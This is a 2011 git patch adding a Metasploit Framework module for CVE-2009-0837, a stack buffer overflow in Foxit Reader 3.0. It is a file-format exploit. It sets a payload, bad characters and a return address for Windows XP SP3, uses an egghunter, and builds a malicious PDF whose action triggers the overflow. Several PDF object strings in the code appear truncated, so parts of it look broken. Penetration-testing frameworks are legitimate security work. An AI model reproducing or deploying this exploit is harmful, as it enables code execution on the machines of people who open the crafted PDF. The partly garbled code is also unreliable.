From 086af94b5ded912aed2cba85a58b5fb546780fc3 Mon Sep 17 00:00:00 2001 From: David Rude Date: Tue, 25 Oct 2011 20:15:12 +0000 Subject: [PATCH] Adds Foxit PDF Reader Exploit CVE-2009-0837 git-svn-id: file:///home/svn/framework3/trunk@14069 4d416f70-5f16-0410-b530-b9f4589650da --- .../fileformat/foxit_pdf_action_bof.rb | 113 ++++++++++++++++++ 1 file changed, 113 insertions(+) create mode 100644 modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb diff --git a/modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb b/modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb new file mode 100644 index 0000000000..916f7d6097 --- /dev/null +++ b/modules/exploits/windows/fileformat/foxit_pdf_action_bof.rb @@ -0,0 +1,113 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'zlib' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::PDF + include Msf::Exploit::Egghunter + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow in Foxit Reader 3.0 builds 1301 and earlier. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'bannedit', # Metasploit module + ], + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE' , '2009-0837' ], + [ 'OSVDB', '55614' ], + [ 'BID', '34035'], + [ 'URL', 'http://www.coresecurity.com/content/foxit-reader-vulnerabilities'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 316, + 'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0d\x22\x28\x29\x2F\x5c\x3c\x3e\x5e\x7e" + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Foxit Reader 3.0 Windows XP SP3', { 'Ret' => 0x01847e7a} ], # ebp + offset + ], + 'DisclosureDate' => 'Mar 09 2009', + 'DefaultTarget' => 0)) + + register_options([ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ], self.class) + + end + + def exploit + pdf = make_pdf + file_create(pdf) + handler + end + + def make_pdf + hunter, egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true }) + + action = "\n<>/NewWindow true>>" + + pdf = "%PDF-1.4\n" + pdf << "1 0 obj\n" + pdf << "<>/Contents 2 0 R " + pdf << "/Annots[ 24 0 R 25 0 R 9 0 R ]>>\n" + pdf << "endobj\n" + pdf << "4 0 obj\n" + pdf << "<>\n" + pdf << "endobj\n" + pdf << "7 0 obj\n" + pdf << "<>\n" + pdf << "endobj\n" + pdf << "9 0 obj\n" + pdf << "<>/BE<>/MK<>>>/AP<>/T()/A 12 0 R /AA 17 0 R >>\n" + pdf << "endobj\n" + pdf << "16 0 obj\n" + pdf << action + pdf << "endobj\n" + pdf << "17 0 obj\n" + pdf << "<>\n" + pdf << "endobj\n" + pdf << "trailer\n" + pdf << "<<00000000000000000000000000000000>]" + pdf << "/DocChecksum/00000000000000000000000000000000/Size 31>>\n" + pdf << "startxref\n" + pdf << "0000\n" + pdf << "%%EOF\n" + pdf + end +end \ No newline at end of file